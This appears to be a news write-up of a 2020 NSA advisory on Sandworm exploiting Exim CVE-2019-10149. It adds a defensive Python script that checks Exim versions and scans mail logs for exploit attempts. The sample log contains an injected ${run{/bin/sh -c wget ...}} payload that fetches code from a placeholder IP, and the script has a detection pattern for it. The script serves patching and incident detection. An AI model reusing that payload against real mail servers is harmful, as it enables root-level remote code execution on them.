Russian Hacking Operation Underway

The NSA has warned the US government a hacking operation is targeting Linux operating systems used to manage infrastructure.

A Russian hacking group known as the "Sandworm Team", part of the GRU (the Main Directorate of the General Staff of the Armed Forces of the Russian Federation), has been exploiting the flaw to gain what amounts to "dream access": after the initial exploit, the actors download and run a shell script that adds privileged users, disables network security settings, updates SSH configurations to enable additional remote access, and executes a further script to enable follow-on exploitation.

This is the same organization that targeted the 2016 United States presidential election, stealing emails from the Democratic National Committee and breaking into voter registration databases.

The target is the Exim mail transfer agent, which runs on countless Linux and UNIX-based systems. The actors exploit Exim by sending an SMTP message whose "MAIL FROM" field carries a crafted command; a vulnerable Exim then executes the attacker's code, with root privileges, since Exim itself runs as root. The vulnerability, CVE-2019-10149, affects Exim 4.87 through 4.91 and was patched on June 5, 2019, but not all Linux administrators are as current on patches as they should be. The Exim developers urged all users to upgrade, and the NSA is now adding its own encouragement for administrators to patch Exim immediately to mitigate this ongoing threat.

If your Linux mail server is running a version of Exim older than 4.93, upgrade immediately; the NSA advisory recommends installing 4.93 or newer.
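The two checks an administrator wants here are (1) whether the installed Exim falls in the CVE-2019-10149 range or below the 4.93 floor the advisory recommends, and (2) whether the mail logs already show the exploit's signature, an Exim string expansion (`${run{...}}`) smuggled into an SMTP envelope address. The script below is an added example written for this page, not code from the NSA advisory or the Exim project. The `exim -bV` output and the mainlog lines are constructed samples, and the `live_exim_version()` helper, the version-range constants and the function names are this example's own assumptions.

```python
import re
import subprocess

# --- Version check -----------------------------------------------------------
# Constructed sample of `exim -bV` output; not captured from a real host.
SAMPLE_EXIM_BV = (
    "Exim version 4.91 #1 built 23-Jan-2019 11:42:04\n"
    "Copyright (c) University of Cambridge, 1995 - 2018\n"
)

# Versions affected by CVE-2019-10149 (4.87 through 4.91) and the version
# the NSA advisory tells administrators to install (4.93 or newer).
CVE_2019_10149_FIRST, CVE_2019_10149_LAST = (4, 87), (4, 91)
MIN_RECOMMENDED = (4, 93)

VERSION_RE = re.compile(r"Exim version (\d+)\.(\d+)(?:\.(\d+))?")


def parse_exim_version(bv_output):
    """Return (major, minor, patch) from `exim -bV` output; patch defaults to 0."""
    m = VERSION_RE.search(bv_output)
    if m is None:
        raise ValueError("no 'Exim version X.Y' line found in output")
    return tuple(int(x) for x in m.groups(default="0"))


def version_status(version):
    """Classify a parsed version: VULNERABLE (CVE range), UPGRADE (below 4.93) or OK."""
    mm = tuple(version[:2])
    if CVE_2019_10149_FIRST <= mm <= CVE_2019_10149_LAST:
        return "VULNERABLE"   # inside the CVE-2019-10149 range: patch now
    if mm < MIN_RECOMMENDED:
        return "UPGRADE"      # outside the CVE range but below the advisory's floor
    return "OK"


def live_exim_version():
    """Run `exim -bV` on this host (assumed helper; not used by the samples below)."""
    out = subprocess.run(["exim", "-bV"], capture_output=True, text=True, check=True)
    return parse_exim_version(out.stdout)


# --- Log triage --------------------------------------------------------------
# The exploit places an Exim string expansion (${run{...}}) inside an SMTP
# envelope address so the MTA evaluates it. Constructed log lines modelled on
# Exim's mainlog format; the payload and addresses are not real traffic.
SAMPLE_MAINLOG = r"""
2020-05-20 03:14:07 1jb7Xz-0001aQ-2M <= ${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x20203.0.113.9\x2Ft\x22}}@localhost H=(mx.example.test) [203.0.113.25] P=esmtp S=1261
2020-05-20 03:15:10 1jb7Yz-0001aR-1F <= alice@example.test H=(mail.example.test) [198.51.100.7] P=esmtp S=2044
2020-05-20 03:16:42 H=(mx.example.test) [203.0.113.25] F=<bob@example.test> rejected RCPT <nobody@mail.example.test>: Unrouteable address
""".strip()

# Match the expansion opener regardless of the whitespace some senders add.
EXPANSION_RE = re.compile(r"\$\{\s*run\s*\{")
PEER_IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def find_exploit_attempts(log_text):
    """Return (line_number, peer_ip, line) for every mainlog line carrying ${run{."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        if EXPANSION_RE.search(line):
            ip = PEER_IP_RE.search(line)
            hits.append((n, ip.group(1) if ip else None, line))
    return hits


if __name__ == "__main__":
    v = parse_exim_version(SAMPLE_EXIM_BV)
    print("Exim %d.%d.%d: %s" % (v + (version_status(v),)))
    for n, ip, line in find_exploit_attempts(SAMPLE_MAINLOG):
        print("line %d, peer %s: %s" % (n, ip, line[:90]))
```

On a real host, replace the constructed sample with `live_exim_version()` and feed `/var/log/exim4/mainlog` (Debian) or `/var/log/exim/main.log` (Red Hat builds) to `find_exploit_attempts()`; a hit means the exploit was at least attempted, so the follow-on changes the advisory describes (new privileged users, altered SSH configuration) should be checked next rather than assumed absent.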

Original source: https://media.defense.gov/2020/May/28/2002306626/-1/-1/0/CSA-Sandworm-Actors-Exploiting-Vulnerability-in-Exim-Transfer-Agent-20200528.pdf

06/01/2020
